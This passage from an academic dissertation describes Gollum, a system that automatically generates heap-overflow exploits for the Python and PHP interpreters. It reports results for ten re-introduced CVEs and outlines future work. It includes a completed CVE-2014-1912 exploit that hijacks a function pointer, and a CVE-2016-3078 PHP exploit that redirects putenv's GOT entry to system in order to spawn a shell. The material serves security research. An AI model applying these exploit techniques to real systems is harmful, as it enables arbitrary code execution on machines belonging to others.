Given the vulnerability trigger and standalone test cases the search for primitives can begin. This is a multi-step process, as described in Section 5.3. A single standalone tool (findprecious.py) is responsible for managing the pipeline of work, from new input generation (Section 5.3.3), to heap layout exploration (Section 5.3.4), to I/O relationship discovery and primitive categorisation (Section 5.3.5). To generate new inputs the vulnerability trigger is injected into various locations in the available tests, to produce inputs that look like Listing 5.5. The interpreter is then run under ShapeShifter with these inputs to check if the overflow successfully triggers. If it does, at the point where the overflow occurs ShapeShifter produces a file like that shown in Listing 5.6. This file describes all of the live allocations at the point of the overflow, providing their size and the offsets within them at which pointers can be found. We can see that the source allocation is of size 129, triggered

1  class ParseTest(unittest.TestCase):
2      pass
3
4  class NamespaceSeparatorTest(unittest.TestCase):
5      pass
6
7  class SetAttributeTest(unittest.TestCase):
8      def setUp(self):
9          self.parser = expat.ParserCreate(
10             namespace_separator='!')
11
12     def test_ordered_attributes(self):
13         self.assertIs(self.parser.ordered_attributes, False)
14         for x in 0, 1, 2, 0:
15             self.parser.ordered_attributes = x
16             self.assertIs(
17                 self.parser.ordered_attributes, bool(x))
18
19 def test_main():
20     run_unittest(SetAttributeTest,
21                  ParseTest,
22                  NamespaceSeparatorTest,
23                  InterningTest)
24
25 if __name__ == "__main__":
26     test_main()

Listing 5.4: An example of an isolated test produced from the Python regression tests

by line 22 of the input file, as well as a number of other allocations. The allocation of size 936 corresponds to the expat parser created on line 9 of the trigger. During heap layout exploration Gollum then iterates over each live allocation, and forces each to be corrupted by the overflow. From each such execution that then crashes in a way that looks like it may provide a useful primitive, a report is produced like the one shown in Listing 5.7. The report contains a disassembly of the crashing instruction as well as the machine context and memory contents of locations pointed to by registers. Listing 5.7 is the report generated when Listing 5.5 is executed under ShapeShifter, with the allocation corresponding to the expat object placed after the overflow source. Note that the address to be called is at *(r12+0x28), and we can see in the data dump that the memory location that r12 points to contains data from line 21 of Listing 5.5 (0x2a is the hex representation of the character ‘*’, 0x31 corresponds to ‘1’, and so on). The I/O relationship discovery is performed using reports of this form, as the tool iterates

1  class ParseTest(unittest.TestCase):
2      pass
3
4  class NamespaceSeparatorTest(unittest.TestCase):
5      pass
6
7  class SetAttributeTest(unittest.TestCase):
8      def setUp(self):
9          self.parser = expat.ParserCreate(
10             namespace_separator='!')
11
12     def test_ordered_attributes(self):
13         self.assertIs(self.parser.ordered_attributes, False)
14         for x in 0, 1, 2, 0:
15             self.parser.ordered_attributes = x
16             self.assertIs(
17                 self.parser.ordered_attributes, bool(x))
18
19 # BEGIN-TRIGGER
20 r, w = socket.socketpair()
21 w.send('AAAA...*1*2*3*4*5*6*7*8+1+2+3+4+5+6+7+8...')
22 y = bytearray('B'*128)
23 r.recvfrom_into(y, 384)
24 # PRINT-DIST-MARKER
25 # END-TRIGGER
26
27 def test_main():
28     run_unittest(SetAttributeTest,
29                  ParseTest,
30                  NamespaceSeparatorTest)
31
32 if __name__ == "__main__":
33     test_main()

Listing 5.5: An example of a file produced by injecting a vulnerability trigger into a test case

1  {
2      "source_alloc": {
3          "index": 7, "size": 129},
4      "live_allocs": [
5          {"index": 5, "size": 176, "pointers": []},
6          {"index": 4, "size": 360, "pointers": [
7              32, 72, 112, 152, 200, 248, 296]},
8          {"index": 1, "size": 936, "pointers": [
9              0, 8, 24, 32, 40]}
10     ]
11 }

Listing 5.6: An example of a summary produced by ShapeShifter of the live objects at the point of an overflow

1  {"category": "call-jmp",
2   "disassembly": "call qword ptr [r12+0x28]",
3   "registers": {
4       "RIP": "0x7f8feea41197",
5       "RBP": "0x7f8ffc361e08",
6       "RSP": "0x7fff5e1c4650",
7       ...
8       "R12": "0x7f8ffc35fc58"},
9   "data": {
10      "RBP": ["0x8b", "0x8b", "0x17", "0x39", ...],
11      "RSP": ["0x80", "0x80", "0xb1", "0x37", ...],
12      "R12": [... "0x2a", "0x31", "0x2a", "0x32",
13          "0x2a", "0x33", "0x2a", "0x34",
14          "0x2a", "0x35", "0x2a", "0x36",
15          "0x2a", "0x37", "0x2a", "0x38"]},
16  "symbolised_backtrace": [
17      "lib/python2.7/lib-dynload/pyexpat.so (PyExpat_XML_ParserFree+0x147) [0x7f8feea41197]",
18      "lib/python2.7/lib-dynload/pyexpat.so (+0x706b) [0x7f8feea3406b]",
19      "bin/python() [0x43d624]",
20      ...
21      "bin/python(_start+0x2e) [0x414e0e]"]}

Listing 5.7: An example of a crash report produced by ShapeShifter after corrupted data was used in a call instruction.

over strings etc. in the primitive trigger and checks for corresponding changes in the “registers” and “data” dictionaries in the reports. The primitive discovery stage stops at this point, having generated the primitive triggers, categorised them and performed the I/O relationship discovery.

1  def test_ordered_attributes(self):
2      self.assertIs(self.parser.ordered_attributes, False)
3      for x in 0, 1, 2, 0:
4          self.parser.ordered_attributes = x
5          self.assertIs(
6              self.parser.ordered_attributes, bool(x))
7
8  # BEGIN-TRIGGER
9  r, w = socket.socketpair()
10 w.send('...*1*2*3*4\xb3\x8a\xc5\xf7\xff\x7f\x00\x00')
11 y = bytearray('B'*128)
12 r.recvfrom_into(y, 384)
13 # PRINT-DIST-MARKER
14 # END-TRIGGER

Listing 5.8: The test_ordered_attributes function after the ip-hijack transformer is applied to Listing 5.5.

Another standalone program (xgen.py) manages the exploit generation process. Each primitive transformer is encoded as a standalone script, and the GA for solving heap layouts is also its own standalone program. xgen.py is responsible for managing the pipeline of work that takes a database of primitives and produces exploits. It begins by applying primitive transformers to the available primitives. Listing 5.8 shows the output of the transformer for ip-hijack primitives, applied to the primitive from Listing 5.5. The only difference is on line 10, where the eight original overflow bytes that corrupted the memory location at *(r12+0x28) have been replaced with the address of a one_gadget gadget. Once the exploit has been verified to work under ShapeShifter, the heap layout problem must be solved. The SHRIKE engine can solve heap layout problems, but it needs markup in the exploit indicating various things, such as where the source and destination buffers are allocated. As described in Section 5.5.1, I have automated this process. First the exploit is modified to inject code that places a line number into the program’s environment before the execution of code that may trigger memory allocation. Listing 5.9 shows our ongoing exploit modified to include these lines.
ShapeShifter monitors this environment variable on memory allocations and frees, and generates a log file containing allocation metadata interleaved with these line numbers. This allows the tool to deduce the lines in the exploit at which

 1 class SetAttributeTest(unittest.TestCase):
 2     def setUp(self):
 3         os.putenv("EVENT","56")
 4         self.parser = expat.ParserCreate(
 5             namespace_separator='!')
 6
 7     def test_ordered_attributes(self):
 8         os.putenv("EVENT","61")
 9         self.assertIs(self.parser.ordered_attributes, False)
10         for x in 0, 1, 2, 0:
11             self.parser.ordered_attributes = x
12             os.putenv("EVENT","65")
13             self.assertIs(
14                 self.parser.ordered_attributes, bool(x))
15
16         # BEGIN-TRIGGER
17         os.putenv("EVENT","72")
18         r, w = socket.socketpair()
19         os.putenv("EVENT","74")
20         w.send('...*1*2*3*4\xb3\x8a\xc5\xf7\xff\x7f\x00\x00')
21         os.putenv("EVENT","76")
22         y = bytearray('B'*128)
23         os.putenv("EVENT","78")
24         r.recvfrom_into(y, 384)
25         # PRINT-DIST-MARKER
26         # END-TRIGGER

Listing 5.9: An example of an exploit with os.putenv calls injected to assist in tracking down the lines which allocate the overflow source and destination.

to inject the information that SHRIKE requires. Listing 5.10 shows the three lines of markup required by SHRIKE: an indication of the overflow source (line 17), an indication of the overflow destination (line 3), and an indication of the distance required between the source and destination allocations (line 21). The search for the inputs required to achieve the required heap layout then proceeds as described in Section 4.2. During the search the newly generated inputs are run under a modified version of the interpreter that supports the injected SHRIKE function calls, but any produced exploits are verified under an unmodified interpreter. An exploit produced for CVE-2014-1912 is shown in Listing 5.11. It has been built entirely automatically and consists of code to perform heap layout manipulation (lines 3-10), to create an object on the heap containing a function pointer (line 12) and to corrupt that function pointer using CVE-2014-1912 (lines 23-26).
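The deduction step that maps allocations back to exploit lines can be sketched as follows. The log record format used here ("&lt;line&gt; malloc &lt;size&gt; &lt;addr&gt;") is a hypothetical stand-in, as are the addresses; ShapeShifter's actual log format is not specified in the text.

```python
def find_alloc_lines(log, src_addr, dst_addr):
    # Scan an allocation log interleaved with EVENT line numbers and
    # report which exploit lines allocated the overflow source and
    # destination buffers.
    src_line = dst_line = None
    for record in log:
        fields = record.split()
        if len(fields) == 4 and fields[1] == "malloc":
            line_no, addr = int(fields[0]), int(fields[3], 16)
            if addr == src_addr:
                src_line = line_no
            if addr == dst_addr:
                dst_line = line_no
    return src_line, dst_line

log = [
    "56 malloc 1024 0x7f0000001000",  # parser allocation (overflow destination)
    "61 free 0x7f0000003000",         # unrelated record, ignored
    "76 malloc 128 0x7f0000002100",   # bytearray (overflow source)
]
src, dst = find_alloc_lines(log, 0x7f0000002100, 0x7f0000001000)
```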

 1 class SetAttributeTest(unittest.TestCase):
 2     def setUp(self):
 3         #X-SHRIKE RECORD-ALLOC01
 4         self.parser = expat.ParserCreate(
 5             namespace_separator='!')
 6
 7     def test_ordered_attributes(self):
 8         self.assertIs(self.parser.ordered_attributes, False)
 9         for x in 0, 1, 2, 0:
10             self.parser.ordered_attributes = x
11             self.assertIs(
12                 self.parser.ordered_attributes, bool(x))
13
14         # BEGIN-TRIGGER
15         r, w = socket.socketpair()
16         w.send('...*1*2*3*4\xb3\x8a\xc5\xf7\xff\x7f\x00\x00')
17         #X-SHRIKE RECORD-ALLOC02
18         y = bytearray('B'*128)
19         r.recvfrom_into(y, 384)
20         # PRINT-DIST-MARKER
21         #X-SHRIKE REQUIRE-DISTANCE128
22         # END-TRIGGER

Listing 5.10: The SetAttributeTest class after the calls required by SHRIKE to identify the overflow source and destination, and print their distance, have been injected.

5.7 Evaluation

The evaluation was designed to answer the question “Is the greybox, modular approach to exploit generation used in Gollum capable of generating exploits for vulnerabilities in real-world language interpreters?”.

5.7.1 Implementation

I implemented the ideas from this chapter in approximately 12,000 lines of Python and 1,000 lines of C. This includes the relevant code from SHRIKE and the GA. The heap layout problems that were solved during exploit generation (Section 5.7.2) were run on a machine with 80 Intel Xeon E7-4870 2.40 GHz cores and 1 TB of RAM, using 40 concurrent analysis processes. The search for primitives (Section 5.7.2) was run on a machine with 6 Intel Core i7-6700HQ 2.60 GHz cores and 16 GB of RAM, using 4 concurrent analysis processes. The exploits were generated to run on 64-bit Fedora 30.

 1 class SetAttributeTest(unittest.TestCase):
 2     def setUp(self):
 3         self.gollum_var_0 = bytearray('A'*935)
 4         self.gollum_var_1 = bytearray('A'*935)
 5         self.gollum_var_2 = bytearray('A'*128)
 6         self.gollum_var_1 = 0
 7         ...
 8         self.gollum_var_707 = bytearray('A'*128)
 9         self.gollum_var_708 = bytearray('A'*128)
10         self.gollum_var_709 = bytearray('A'*128)
11
12         self.parser = expat.ParserCreate(
13             namespace_separator='!')
14
15     def test_ordered_attributes(self):
16         self.assertIs(self.parser.ordered_attributes, False)
17         for x in 0, 1, 2, 0:
18             self.parser.ordered_attributes = x
19             self.assertIs(
20                 self.parser.ordered_attributes, bool(x))
21
22         # BEGIN-TRIGGER
23         r, w = socket.socketpair()
24         w.send('...*1*2*3*4\xb3\x8a\xc5\xf7\xff\x7f\x00\x00')
25         y = bytearray('B'*128)
26         r.recvfrom_into(y, 384)
27         # PRINT-DIST-MARKER
28         # END-TRIGGER

Listing 5.11: The completed exploit with code injected to solve the heap layout problem.

5.7.2 Exploitation

To evaluate my approach to exploit generation I found ten previously patched security-relevant vulnerabilities across Python and PHP and added them back into the interpreters. The vulnerabilities were selected to fit the pattern that Gollum is intended to support, namely linear heap overflows where the attacker can control the data being written, and the amount of data written is either under their control, or bounded such that it won't simply cause the process to immediately die once the overflow is triggered. I used version 2.7.15 of Python and version 7.1.6 of PHP, the latest versions at the start of my implementation effort. Python and PHP were selected as they are completely independent codebases, and represent a diverse set of design decisions in the space of interpreters, while still fitting within the parameters of what Gollum is designed to analyse. To the best of my knowledge these are also the

Table 5.1: Primitive search results. The time taken to find all primitives is presented.

Target   Bug ID           Allocatorᵃ   Ovf. Len.ᵇ   IPH Prims.ᶜ   MR Prims.ᵈ   Prim. Searchᵉ
Python   PY-24481         dlmalloc     192          432           2065          9h12m
Python   NUMPY-UNK        dlmalloc     240          830           5567          8h05m
Python   CVE-2007-4965    pymalloc     124          13283         45218         18h09m
Python   CVE-2014-1912    dlmalloc     256          849           4264          5h51m
Python   CVE-2016-2533    dlmalloc     96           390           1980          8h50m
Python   CVE-2016-5636    pymalloc     256          111           68969         8h15m
Python   CVE-2018-18557   dlmalloc     128          778           6341          16h32m
PHP      CVE-2018-18557   dlmalloc     128          8735          26142         17h07m
PHP      CVE-2016-3074    zend_alloc   16           40647         50585         6h57m
PHP      CVE-2016-3078    zend_alloc   256          1925          16446         9h32m

ᵃ The allocator managing the heap on which the overflow occurs.
ᵇ The number of bytes corrupted by the overflow.
ᶜ The number of ip-hijack primitives found.
ᵈ The number of mem-write primitives found.
ᵉ Total time to complete the primitive search.

Table 5.2: Exploit generation results. The time to generate the first successful exploit is presented.

Target   Bug ID           Public Exploit   Exploit Created   Exp. w/o Layoutᵃ   Layout Searchᵇ   Exp. Totalᶜ
Python   PY-24481         ✗                ✓                 25m                2m               27m
Python   NUMPY-UNK        ✓                ✓                 30m                11m              41m
Python   CVE-2007-4965    ✗                ✓                 30m                15m              45m
Python   CVE-2014-1912    ✓                ✓                 25m                4m               29m
Python   CVE-2016-2533    ✗                ✓                 27m                11m              38m
Python   CVE-2016-5636    ✓                ✓                 28m                13m              41m
Python   CVE-2018-18557   ✗                ✓                 29m                21m              50m
PHP      CVE-2018-18557   ✗                ✓                 15m                17m              32m
PHP      CVE-2016-3074    ✓                ✓                 23m                30m              53m
PHP      CVE-2016-3078    ✓                ✓                 22m                18m              40m

ᵃ Time taken to generate the first exploit, modulo a heap layout.
ᵇ Time taken to find the correct layout for the first exploit.
ᶜ Total time taken to produce the first exploit from the primitive database.

largest programs for which heap-based exploits, or possibly any exploits, have been automatically constructed. The PHP interpreter is approximately 1.1 million lines of code, and the Python interpreter is approximately 450 thousand lines of code.⁴ The vulnerabilities selected are listed in Table 5.2, identified by their CVE ID. Some are in the interpreter's core functionality, while others are in third-party libraries accessible via the interpreter. A CVE ID is not available for two. PY-24481 is the identifier in the Python bug tracker for a heap overflow that was fixed, but for which a CVE ID was not requested. NUMPY-UNK is a vulnerability that existed in version 1.11.0 of the NumPy library for Python. I found it described and used in an exploit online [96], but could not find the corresponding fix for it, or a bug identifier. It is also worth noting that CVE-2018-18557 impacts both PHP and Python. It is a vulnerability in libtiff that can be triggered via a number of image processing libraries for both interpreters. I have included it for both PHP and Python as it provides an example of Gollum building an exploit for different interpreters using the same underlying bug. Both the Python and PHP interpreters make use of both the system allocator and their own custom allocators. Some of the vulnerabilities in the evaluation set are overflows on the system heap, while others are on a custom allocator's heap. The third column in Table 5.1 identifies which allocator is relevant for each vulnerability. The system allocator is dlmalloc, the custom Python allocator is pymalloc and the custom PHP allocator is zend_alloc.

Primitive Discovery

As mentioned in Section 5.3.2, the tests that come with PHP tend to be small and test a single issue or piece of functionality. There are approximately 12k such PHP tests and they are used directly. For Python we have to extract individual tests from files that may each contain hundreds of tests for various bugs and functionality across an entire module. Gollum successfully extracts approximately 2.3k individual tests for Python. For each vulnerability, and for each test, Gollum creates a set of new tests by injecting the vulnerability at every viable location in the test. Then, each of these new tests with the vulnerability injected is run under ShapeShifter, once for each possible heap layout. So, while we start with only 12k tests for PHP and 2.3k for Python, per vulnerability this translates to approximately 100k tests containing the injected vulnerability for PHP and 25k for Python. To consider all possible heap layouts for all possible tests then requires approximately 2.7m executions for PHP and 1.25m for Python. From these executions, the number of ip-hijack and mem-write primitives discovered is given in columns five and six of Table 5.1. The total time to process the tests and run all of the primitive search is given in column seven. For each vulnerability Gollum finds at least one hundred ip-hijack primitives, and thousands of mem-write primitives.

⁴ As reported by CLOC, http://cloc.sourceforge.net/
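The per-method test extraction described above can be sketched with Python's ast module. This is a simplified illustration under the assumption that tests follow the unittest naming convention; the real splitter must also carry over module-level imports, helpers, and setUp/tearDown code.

```python
import ast

def extract_tests(source):
    # List (class, method) pairs for unittest-style test methods so that
    # each can later be emitted as a standalone file with a single test.
    tests = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            for item in node.body:
                if isinstance(item, ast.FunctionDef) and item.name.startswith("test"):
                    tests.append((node.name, item.name))
    return tests

# A cut-down module in the style of the pyexpat tests used above:
module = """
class SetAttributeTest(unittest.TestCase):
    def setUp(self):
        self.parser = expat.ParserCreate(namespace_separator='!')
    def test_ordered_attributes(self):
        pass
    def test_other_behaviour(self):
        pass
"""
```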

Exploit Generation

In Table 5.2 I provide the time required to build the first successful exploit per target, using the ip-hijack primitive transformer from Section 5.4.1. This time is broken down into the time taken to first generate an exploit modulo a heap layout, and then to solve that layout. An exploit is successfully generated for all 10 vulnerabilities, including the five that do not have a pre-existing public exploit. It takes less than an hour to build the first exploit in all cases, given the candidate primitive database. This means that, given only a vulnerability trigger, Gollum is able to find a way to allocate a heap object containing data to corrupt, corrupt that data via the vulnerability, and then make use of that data in a way that triggers the required payload. My answer to RQ2 is therefore that Gollum is capable of generating fully functional exploits in interpreters, given my attacker model. The variability in the number of primitives found, and in the time taken to find them, comes from at least three sources. The first point of difference is between the interpreters themselves. Different interpreters, and third-party libraries, are implemented differently and use pointers in different ways. Furthermore, their tests may expose more or less of this behaviour. The second point of difference is between the vulnerabilities. Different vulnerabilities can be used to corrupt different amounts of data. For example, with CVE-2007-4965 we were able to corrupt 124 bytes of application data, whereas with CVE-2016-3078 we could corrupt an arbitrary amount, and chose to corrupt 256 bytes. A third point of difference is that within each interpreter, different subsystems may use different allocators, and the corruption opportunities are limited to objects allocated with the same allocator. Again considering Python, CVE-2007-4965 allocates the overflow source with pymalloc. However, CVE-2018-18557 uses the system allocator functions offered by glibc.
As the source buffer for each vulnerability is on a different heap, the available destination buffers will also differ, and so will the available primitives.

Failure Cases

The vulnerabilities given in Table 5.2 are all of the vulnerabilities I tested Gollum with. The reason that there are no failure cases is that Gollum has a simple pattern that a vulnerability must match for Gollum to work with it: the vulnerability must allow the exploit to corrupt N contiguous bytes in the program's memory with data directly derived from the input, where N is sufficiently large to allow a pointer on the target architecture to be reliably modified to point from its starting location to the location required by the payloads. This allows a user to discard vulnerabilities that Gollum will not be able to work with, usually simply by reading the vulnerability report. An example of such a vulnerability that I discarded is CVE-2019-6977, a heap-based buffer overflow in PHP. The vulnerability allows a user to corrupt every 8th byte beyond a heap-allocated buffer. An exploit developer would be able to turn this into an exploit, but Gollum cannot, as it does not yet have a transformer that can work with that sort of control.

5.8 Assisted Exploit Generation

Gollum can discover primitives in categories for which, as yet, it does not have an automatic means of turning them into exploits. For example, of the mem-write subcategories, the only one for which it currently supports automatic exploit generation is wr-arb. However, primitives in the other categories are likely to be usable by an exploit developer, and Gollum can assist in this process, adding significant automation. To illustrate how, I will walk through the construction of an exploit for the PHP interpreter using CVE-2016-3078. CVE-2016-3078 allows one to overflow an arbitrary number of bytes after a heap-allocated buffer. As shown in Table 5.1, with a trigger that corrupts 256 bytes Gollum finds 1925 ip-hijack primitives and 16446 mem-write primitives. Gollum then successfully automatically generates an exploit using an ip-hijack primitive. However, there are other avenues for exploitation. To support manual exploit development (shown as the lower workflow ending in an exploit in Figure 5.1), a user has access to the primitives in the candidate primitive database from Figure 5.1, as well as the heap layout manipulation engine. The process for assisted exploit generation begins much the same as with automatic exploit generation. A vulnerability trigger is imported to the tool, tests for the interpreter are extracted, and the primitive search component of Gollum runs. As explained in Section 5.6, the output of this stage includes JSON files

1 {"category": "inc-mem",
2  "disassembly": "add dword ptr[rax],0x1",
3  "registers": {
4      ...
5      "RAX": "0x342a332a322a312a"},
6
7  "symbolised_backtrace": [
8      "/data/Documents/git/-shrike/install/bin/php (php_stream_context_set_option+0xa4) [0x79ea34]",
9      ...]}

Listing 5.12: The crash report provided by ShapeShifter for an inc-mem primitive using CVE-2016-3078.

 1 <?php
 2 ...
 3 ...
 4     array('method' => 'POST', 'content' => $postdata)
 5 );
 6 # BEGIN-TRIGGER
 7 $zip = new ZipArchive();
 8 $zip->open('/tmp/2deb4a90-627f-4183-b129-0f47be76db83');
 9 for ($i = 0; $i < $zip->numFiles; $i++) {
10     $data = $zip->getFromIndex($i);
11 }
12 # PRINT-DIST-MARKER
13 # END-TRIGGER
14 $res = stream_context_create($opts);
15 ?>

Listing 5.13: The automatically discovered inc-mem primitive trigger using CVE-2016-3078.

describing the primitives. To find a potentially usable primitive we can search these JSON files using standard command-line tools. For the purposes of this example, suppose we wish to create an exploit using a memory primitive. We begin by searching, using grep, for a primitive with the type inc-mem. The details of one such primitive are shown in Listing 5.12. From this and the accompanying I/O relationship information, we can conclude that the primitive allows us to increment the value at an address of our choosing. The actual trigger for the primitive is shown in Listing 5.13. One quirk in this trigger that we have not previously seen is that Gollum supports vulnerabilities where the overflow contents are read from a file. This is straightforward, as we just extend the I/O relationship discovery process to the contents of files that are read by the interpreted program.
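The search over the primitive reports can equally be done programmatically. The sketch below filters reports by category; the report field names follow the excerpt in Listing 5.12, while the filenames and the ip-hijack disassembly string are illustrative assumptions.

```python
import json

def find_primitives(reports, category):
    # 'reports' is an iterable of (filename, json_text) pairs, one per
    # candidate primitive report produced by the primitive search stage.
    hits = []
    for name, text in reports:
        record = json.loads(text)
        if record.get("category") == category:
            hits.append((name, record.get("disassembly")))
    return hits

reports = [
    ("prim_0001.json", '{"category": "ip-hijack", "disassembly": "call qword ptr[r12+0x28]"}'),
    ("prim_0002.json", '{"category": "inc-mem", "disassembly": "add dword ptr[rax],0x1"}'),
]
```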

 1 <?php
 2 ...
 9     array('method' => 'POST', 'content' => $postdata));
10
11 # BEGIN-TRIGGER
12 $zip = new ZipArchive();
13 $zip->open('/tmp/2deb4a90-627f-4183-b129-0f47be76db83');
14 for ($i = 0; $i < $zip->numFiles; $i++) {
15     $data = $zip->getFromIndex($i);
16 }
17 # PRINT-DIST-MARKER
18 # END-TRIGGER
19
20 $hold = array();
21 for ($x = 0; $x < 45824; $x++) {
22     array_push($hold, stream_context_create($opts));
23 }
24
25 putenv("/bin/sh;=bla");
26 ?>

Listing 5.14: The completed exploit for CVE-2016-3078. It uses an inc-mem primitive to modify the GOT entry of putenv until it points to system.

Thus, Gollum can determine which bytes in the file read on line 9 correspond to the contents of the rax register that is used in the add instruction. One method of using an inc-mem primitive in an exploit is to find a pointer to a function that takes a controllable string in the .got.plt section of the target, and increment it until it points to system. This requires the primitive to be used multiple times, so we must first determine if it is reusable. This is a manual process, as Gollum lacks a means to automate this step. First we have to figure out what code actually triggers the primitive. Using the backtrace from Listing 5.12 we know the function containing the crashing instruction, and with a small amount of digging in the target program's code we can determine that it is called from line 14 of Listing 5.13. To determine if it is reusable we can simply call stream_context_create($opts) repeatedly and check that the value at the address we have tried to increment has changed accordingly.

Next we calculate the distance from the pointer in the .got.plt that we wish to modify to the address of the system function. For this exploit, I decided to modify the GOT entry for putenv, and it was located at an address 45824 bytes below system. Thus, we need to trigger the primitive 45824 times, after modifying the bytes that corrupt the rax register so that it points to putenv's GOT entry. We also need to insert a call to putenv with an argument that will result in a '/bin/sh' shell being executed. We can perform these modifications and test the exploit while still running the target process under ShapeShifter. Once the exploit is verified to be working under ShapeShifter we must manually inject the required SHRIKE directives (described in Section 5.5.1 and Section 5.6). SHRIKE then automatically finds the inputs required to achieve the required heap layout. The final exploit is shown in Listing 5.14. Gollum handled the discovery of the primitive as well as the heap layout manipulation, while I had to manually figure out how to trigger the primitive multiple times, and the exploitation strategy to use it to execute a shell.
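The distance calculation that fixes the number of primitive triggers can be illustrated as follows. The concrete addresses below are hypothetical, chosen only so that their difference matches the 45824-byte distance reported above; real values come from the target's libc.

```python
# Hypothetical libc symbol addresses, for illustration only.
addr_system = 0x7ffff7a33540   # address of system()
addr_putenv = 0x7ffff7a28240   # value initially stored in putenv's GOT slot

# The inc-mem primitive adds 1 per trigger, so the trigger count equals
# the byte distance between the two addresses.
increments = addr_system - addr_putenv
```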

5.9 Generalisability and Threats to Validity

I believe that the approach implemented in Gollum can be generalised to work against any interpreter that fits the model described in Section 5.1.1 and contains heap overflow vulnerabilities of the type that Gollum is designed to work with. However, we cannot conclude that without actually extending it to work on such interpreters. The threat to the validity of this generalisation is that Gollum is over-fitted to some aspect of a single vulnerability or interpreter. I have attempted to mitigate this threat by selecting multiple vulnerabilities, spread across multiple sub-components of two entirely different interpreters.

    Science is knowledge which we understand so well that we can teach it to a computer; and if we don't fully understand something, it is an art to deal with it.
        — Donald Knuth, Computer Programming as an Art

6 Conclusion

In this dissertation I have presented a modular and greybox approach to automatic exploit generation for heap overflows in language interpreters, and demonstrated the capabilities of this approach by generating exploits for the PHP and Python interpreters. The central idea of this work is that the exploit generation problem can be broken down into multiple sub-problems, that these sub-problems can be addressed in a greybox fashion, and that the solutions to each sub-problem can be combined to perform exploit generation. I have identified several such sub-problems and provided algorithms for solving them, as well as an architecture for combining these algorithms to perform exploit generation. In particular, I have shown how greybox methods can be used to discover code fragments that cause allocations of particular sizes, to discover code fragments that allocate objects containing pointers, to solve heap layout problems, to search for primitives, to perform a limited form of taint tracking, and finally to construct functioning exploits. While there is considerable engineering involved in this, the possibilities offered by greybox approaches make it a worthwhile endeavour, with many attractive properties in comparison to whitebox-led approaches. In particular, greybox methods often allow for the construction of high-throughput, parallelisable solutions that can easily scale up with an increase in available hardware. In the field of vulnerability detection, greybox methods are currently the gold standard, and my intuition is that in the coming years they will dominate AEG as well. The field of AEG research is just over a decade old. For much of that decade, AEG systems were symbolic-execution based, entirely automated, and focused on limited categories of target software and vulnerability classes. In the past three

years there has been rapid change, with novel research that can be categorised along four axes: (1) the program analysis techniques and system architectures used, (2) the level of automation that the solution brings, (3) the categories of target software being attacked, and (4) the types of vulnerabilities being used. There are still many unexplored points in this space, and there is still both research and engineering to be done for practical, widely deployed exploit generation and automation systems. However, the future looks bright for AEG, and in the coming years we will certainly see increased adoption of automation in exploit development. I hope this dissertation is a useful stepping stone in getting there.

6.1 Future Work

Exploit generation is a young field, with a significant number of open problems that are interesting, challenging and have the potential for significant real-world impact. Here I outline a few directions that lead on from the work presented in this dissertation, and that I believe are on the path towards effective automatic, and semi-automatic, exploit generation systems.

6.1.1 Greybox AEG

Integrating whitebox methods into the greybox process

In this work I purposefully avoided whitebox methods, such as symbolic execution or instrumentation-based taint tracking. I did this for a couple of reasons. The first is practical: whitebox methods are often slow, difficult to scale, and it is not apparent if they are at all appropriate as the main driving force behind the analysis of targets like interpreters. The second reason is that I wanted to see how far a greybox solution could be pushed. Whitebox methods are tempting based on their promise of precise results, but often end up being a bottleneck. My belief is that many tasks that are traditionally considered the domain of whitebox methods could be performed in an entirely greybox fashion, and in this fashion scaled to far larger targets with better overall performance. With that said, whitebox methods do have a place in exploit generation systems if used in a limited fashion. Now that I have shown a completely greybox pipeline, I think it is prudent to start considering where whitebox methods can be integrated to provide more precision, without sacrificing scalability. Wu et al. [43] have shown how symbolic execution can be used to diversify the number of primitives found from a particular vulnerability and starting context, and it is likely that a similar approach can be extended to

interpreters. In their work they use the angr symbolic execution engine [103], with its off-the-shelf state-space exploration strategies. While this was found to be sufficient for their purposes, it is likely that a more efficient search of the state space for primitives can be done using search strategies that are specific to the task. For example, in their case they are dealing with use-after-free vulnerabilities, and they mark the entire freed object as symbolic once it is dereferenced for the first time after it has been freed. One option for a more efficient state-space search from that point onward might be to use a static analysis to scan for dereferences of pointers that may point to the freed object, and use this data to guide the state selection procedure of the symbolic execution engine.

Investigating other applications of lazy resolution

I believe that lazy resolution for constraints in exploit generation is likely to be a useful idea, beyond just its use for heap layout constraints. It allows one to solve potentially expensive problems once it has been confirmed that a solution would actually be useful. Furthermore, it allows the integration of manual and automatic effort; the analysis engine can assume a problem solved and generate the remainder of the exploit, and if it turns out the problem cannot be automatically resolved then an analyst can deal with it at a later stage. I believe it is worth considering other applications of this idea in exploit generation, e.g. it could be used for the exploitation of use-after-free vulnerabilities, where a logical heap layout could be assumed to hold, or race conditions where a particular scheduling is assumed to hold.

Integration with payload generation mechanisms

Control-flow hijacking exploits usually consist of a non-trivial payload that is executed after the instruction pointer has been hijacked. In this work I have used fairly rudimentary payloads, namely simple gadgets to execute a local shell. Real-world exploits typically have more complex payloads, and often rely on Return-Oriented Programming (ROP). Furthermore, in recent years, the payload may need to be constructed to deal with control-flow integrity mechanisms. There are automated solutions to generate such payloads, but it remains to be seen how best to integrate them with the rest of an AEG pipeline.

6.1.2 Heap Layout Manipulation

Heap layout manipulation for non-deterministic allocators

I have focused on deterministic allocators in this work. Such allocators are frequently encountered, but allocators that use non-determinism in order to frustrate exploitation efforts are becoming more common. For example, the Windows system allocator makes use of non-determinism, and there are a number of others that do so as well [77, 81, 82]. Addressing the problem of non-deterministic allocators would have both offensive and defensive applications. The offensive applications are obvious, and defensively such a system would allow one to check that allocators that claim to provide particular guarantees related to the difficulty of reliably achieving particular heap layouts actually do provide those guarantees.

Heap layout manipulation for variable starting states

An assumption in this work is that the exploit generation system can predict the starting state of the heap. This is feasible in some situations, but often an exploit developer will not be able to determine the initial state concretely. In such situations, exploit developers have a few different options, depending on the target software and available vulnerabilities. One strategy is to try to normalise the heap by making large numbers of allocations. Another is, instead of trying to place a particular object adjacent to the overflow source, to spray a large number of objects, trigger the overflow, and then try to determine which, if any, were corrupted. An automated solution to this problem remains to be investigated.

Heap layout manipulation for targets besides language interpreters

Due to their ubiquity, language interpreters are an interesting exploitation target. However, there is plenty of other software in the world worth compromising that presents a different challenge when it comes to automating heap layout manipulation. In some senses, a language interpreter makes it easier to perform heap layout manipulation than, for example, an FTP server. With a language interpreter we can often find ways to easily allocate and deallocate useful objects as we see fit, and with almost no constraints. A network server, on the other hand, may have a more restricted set of ways to interact with it, and perhaps offer little control over the size of objects allocated.

6.1.3 General AEG

Exploit Generation as Program Synthesis

